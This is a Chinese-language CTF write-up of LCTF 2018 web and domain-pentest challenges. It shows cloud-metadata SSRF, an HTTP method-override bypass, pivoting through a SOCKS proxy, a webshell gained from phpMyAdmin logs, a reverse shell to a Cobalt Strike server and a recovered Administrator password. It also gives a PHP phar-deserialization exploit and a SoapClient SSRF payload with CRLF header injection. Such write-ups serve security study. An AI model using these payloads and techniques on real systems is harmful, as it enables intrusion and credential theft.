Travel

这题一开始一直以为可以有什么办法可以ssrf,腾讯云主机技能可以提供了返回mac地址的接口

1
http://118.25.150.86/?url=http://metadata.tencentyun.com/latest/meta-data/network/interfaces/macs

打会mac地址

1
52:54:00:48:c8:73

然后可以算出uuid.getnode()

1
90520735500403

但是nginx禁用了PUT请求,可以使用X-HTTP-Method-Override来绕过,看文章

1
https://www.web-tinker.com/article/20995.html

然后通过写入私钥ssh连进去

God of domain-pentest

首先nmap扫一下端口可以发现1090开着socks5服务,直接上代理扫一下内网网段扫出172.21.0.8开着80端口,

将已经添加进socksCap64中

扫到phpmyadmin,后台日志getshell

这里用个webshell很不方便渗透,我先3389连进去瞅瞅

但是连不进去啊。

然后我起个CS的server端在公网上,直接在0.8的机器上弹个shell过去

1
2
3
* Username : Administrator
* Domain : PUPILES-PC
* Password : xdsec@lctf2018

通过

1
ipconfig /all

可以知道有个域控

1
DNS 服务器 . . . . . . . . . . . : 172.21.0.7
1
https://www.cnblogs.com/dreamer-fish/p/3473895.html

通过搜集域内信息得到域的hostname:SUB-DC.web.lctf.com

show me shell1

代码如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
<?php
$SECRET = `../read_secret`;
$SANDBOX = "../data/" . md5($SECRET. $_SERVER["REMOTE_ADDR"]);
$FILEBOX = "../file/" . md5("K0rz3n". $_SERVER["REMOTE_ADDR"]);
@mkdir($SANDBOX);
@mkdir($FILEBOX);
if (!isset($_COOKIE["session-data"])) {
$data = serialize(new User($SANDBOX));
$hmac = hash_hmac("md5", $data, $SECRET);
setcookie("session-data", sprintf("%s-----%s", $data, $hmac));
}
class User {
public $avatar;
function __construct($path) {
$this->avatar = $path;
}
}
class K0rz3n_secret_flag {
protected $file_path;
function __destruct(){
if(preg_match('/(log|etc|session|proc|data|read_secret|history|class|\.\.)/i', $this->file_path)){
die("Sorry Sorry Sorry");
}
include_once($this->file_path);
}
}
function check_session() {
global $SECRET;
$data = $_COOKIE["session-data"];
list($data, $hmac) = explode("-----", $data, 2);
if (!isset($data, $hmac) || !is_string($data) || !is_string($hmac)){
die("Bye");
}
if ( !hash_equals(hash_hmac("md5", $data, $SECRET), $hmac) ){
die("Bye Bye");
}
$data = unserialize($data);
if ( !isset($data->avatar) ){
die("Bye Bye Bye");
}
return $data->avatar;
}
function upload($path) {
if(isset($_GET['url'])){
if(preg_match('/^(http|https).*/i', $_GET['url'])){
$data = file_get_contents($_GET["url"] . "/avatar.gif");
if (substr($data, 0, 6) !== "GIF89a"){
die("Fuck off");
}
file_put_contents($path . "/avatar.gif", $data);
die("Upload OK");
}else{
die("Hacker");
}
}else{
die("Miss the URL~~");
}
}
function show($path) {
if ( !is_dir($path) || !file_exists($path . "/avatar.gif")) {
$path = "/var/www";
}
header("Content-Type: image/gif");
die(file_get_contents($path . "/avatar.gif"));
}
function check($path){
if(isset($_GET['c'])){
if(preg_match('/^(ftp|php|zlib|data|glob|phar|ssh2|rar|ogg|expect)(.|\\s)*|(.|\\s)*(file|\.\.)(.|\\s)*/i',$_GET['c'])){
die("Hacker Hacker Hacker");
}else{
$file_path = $_GET['c'];
list($width, $height, $type) = @getimagesize($file_path);
die("Width is :" . $width." px<br>" .
"Height is :" . $height." px<br>");
}
}else{
list($width, $height, $type) = @getimagesize($path."/avatar.gif");
die("Width is :" . $width." px<br>" .
"Height is :" . $height." px<br>");
}
}
function move($source_path,$dest_name){
global $FILEBOX;
$dest_path = $FILEBOX . "/" . $dest_name;
if(preg_match('/(log|etc|session|proc|root|secret|www|history|file|\.\.|ftp|php|phar|zlib|data|glob|ssh2|rar|ogg|expect|http|https)/i',$source_path)){
die("Hacker Hacker Hacker");
}else{
if(copy($source_path,$dest_path)){
die("Successful copy");
}else{
die("Copy failed");
}
}
}
$mode = $_GET["m"];
if ($mode == "upload"){
upload(check_session());
}
else if ($mode == "show"){
show(check_session());
}
else if ($mode == "check"){
check(check_session());
}
else if($mode == "move"){
move($_GET['source'],$_GET['dest']);
}
else{
highlight_file(__FILE__);
}
include("./comments.html");

先利用upload接口上传个webshell

1
O:4:"User":1:{s:6:"avatar";s:40:"../data/4d9732285a8eb10a67dcbe6fba011d05";}-----720e1a11f83c75952a8ddfb354836aa6

拿到cookie里面的路径,然后挂上代理再传个phar文件为什么要挂代理呢,因为如果不挂代理就会覆盖掉之前的文件

新的Phar文件上传到了4016d7466675eb5bd236f30bd5fc87ea/avatar.gif

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<?php
class K0rz3n_secret_flag {
protected $file_path='../data/4d9732285a8eb10a67dcbe6fba011d05/avatar.gif';
function __destruct(){
if(preg_match('/(log|etc|session|proc|read_secret|history|class)/i', $this->file_path)){
die("Sorry Sorry Sorry");
}
include_once($this->file_path);
}
}
$a= new K0rz3n_secret_flag;
$p = new Phar('1.phar', 0);
$p->startBuffering();
$p->setStub('GIF89a<?php __HALT_COMPILER(); ?>');
$p->setMetadata($a);
$p->addFromString('1.txt','text');
$p->stopBuffering();

推荐文章https://blog.zsxsoft.com/post/38

然后我们可以在check中利用`getimagesize来触发

1
compress.zlib://phar://../data/4016d7466675eb5bd236f30bd5fc87ea/avatar.gif

beasphp’r revenge

1
2
3
4
5
6
7
8
9
10
11
12
<?php
highlight_file(__FILE__);
$b = 'implode';
call_user_func($_GET[f],$_POST);
session_start();
if(isset($_GET[name])){
$_SESSION[name] = $_GET[name];
}
var_dump($_SESSION);
$a = array(reset($_SESSION),'welcome_to_the_lctf2018');
call_user_func($b,$a);
?>
  • session反序列化
  • soapclient来ssrf

这题与XCTF总决赛的时候一道题很类似

写入payload

触发__call魔术方法

1
2
3
4
5
6
<?php
$target = "http://127.0.0.1/flag.php";
$attack = new SoapClient(null,array('location' => $target,
'user_agent' => "uuu: aaa\r\n"."Cookie: PHPSESSID=sessionid\r\n",'uri' => "121331"));
$payload = urlencode(serialize($attack));
echo $payload;